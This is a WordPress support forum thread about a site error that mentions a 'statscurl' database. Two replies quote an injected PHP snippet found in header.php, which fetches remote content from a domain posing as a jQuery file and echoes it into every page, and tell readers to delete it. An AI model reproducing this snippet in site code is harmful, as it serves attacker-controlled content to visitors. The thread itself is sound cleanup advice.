• Couldn’t connect to database server.Couldn’t find database admin_4llw4d.An unexpected problem has occured with the application.
    SELECT statscurl_id FROM statscurl WHERE statscurl_ip = ”;

    This is the error we are currently receiving on https://www.beatboxxx.com
    Any ideas on what could be causing this? I have checked with our host and they say everything checks out on their end. Thanks!

Viewing 7 replies - 1 through 7 (of 7 total)
  • De-activate the ‘statscurl’ plugin?

    I am also having this same issue…


    Couldn’t connect to database server.Couldn’t find database admin_4llw4d.An unexpected problem has occured with the application.
    SELECT statscurl_id FROM statscurl WHERE statscurl_ip = ”;

    PLEASE HELP!!!!!

    Found that [redacted]!

    open up Editor
    Find “
    <?php
    if(function_exists(‘curl_init’))
    {
    $url = “https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js&#8221;;
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo “$data”;
    }
    ?>

    Delete that shit… and your good [:

    I am having the same issues, but I do not use any plugin for stats.

    Log in to wp-admin

    Open Appearance

    Open Editor

    Open Header (header.php)

    Find the code

    <?php
    if(function_exists(‘curl_init’))
    {
    $url = “https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js&#8221;;
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo “$data”;
    }
    ?>

    Delete / Remove the code

    Save / Update File

    The error code will be gone

    If the error disappears when statscurl plugin is deactivated it is confirmed that the plugin is causing the error.

    The error shows that the plugin is not able to connect to the respective database.

    Better you guys look for the plugin forum, hope that they have come up with the fix.

    Yeah right this error showing because of plugins. same problem with

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘Error on WordPress Site’ is closed to new replies.